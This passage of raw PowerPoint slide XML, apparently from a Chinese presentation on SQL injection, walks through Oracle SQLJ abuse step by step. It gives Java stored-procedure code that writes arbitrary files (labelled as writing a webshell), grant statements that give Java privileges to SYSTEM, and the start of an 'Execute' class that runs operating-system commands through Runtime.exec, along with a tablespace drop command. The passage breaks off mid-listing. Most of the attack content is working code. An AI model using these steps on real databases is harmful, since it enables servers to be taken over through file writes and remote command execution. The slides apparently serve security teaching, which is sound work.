              </a:rPr>
              <a:t>drop tablespace shell including contents;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p: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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle SQLJ编译执行Java代码：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQLJ可以这样玩：首先创建一个类提供一个静态方法： </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="1423670"/>
            <a:ext cx="5523865" cy="2295525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle SQLJ编译执行Java代码：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行以下SQL创建Java储存过程：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>create or replace and compile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>java source named "getShell"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>as public class GetShell {public static int getShell(String p, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>String c) {int RC = -1;try {new </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>java.io.FileOutputStream(p).write(c.getBytes());RC = 1;} catch </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Exception e) {e.printStackTrace();}return RC;}} </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle SQLJ编译执行Java代码：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>创建函数：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>create or replace</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>function getShell(p in varchar2, c in varchar2) return number</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>language java</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>name 'util.getShell(java.lang.String, java.lang.String) return Integer';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle SQLJ编译执行Java代码：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>创建存储过程：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>create or replace procedure RC(p in varChar, c in varChar)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>x number;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>begin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>x := getShell(p,c);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>end;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Request &amp; Response(请求与响应)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。 ￼ </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="1099185"/>
            <a:ext cx="6724015" cy="2628265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle SQLJ编译执行Java代码：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>授予Java权限：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>variable x number;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>set serveroutput on;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>exec dbms_java.set_output(100000);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>grant javasyspriv to system;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>grant javauserpriv to system;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle SQLJ编译执行Java代码：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>写webshell：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>exec :x:=getShell('d:/3.txt','selina');</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>然后，嘿嘿嘿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="2815590"/>
            <a:ext cx="4812665" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle SQLJ编译执行Java代码：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQLJ执行cmd命令：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>方法这里和上面几乎大同小异，一样的提供一个静态方法，然后去</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>创建一个存储过程。然后调用Java里的方法去执行命令。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle SQLJ编译执行Java代码：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>创建Java存储过程:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="50000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>create or replace and compile java source named "Execute" as   </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>import java.io.BufferedReader;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>import java.io.InputStreamReader;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>public class Execute {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    public static void executeCmd(String c) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        try {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            String l="",t;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            BufferedReader br = new BufferedReader(new InputStreamReader(java.lang.Runtime.getRuntime().exec(c).getInputStream(),"gbk"));</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            while((t=br.readLine())!=null){</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>                l+=t+"\n";</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            System.out.println(l);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        } catch (Exception e) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
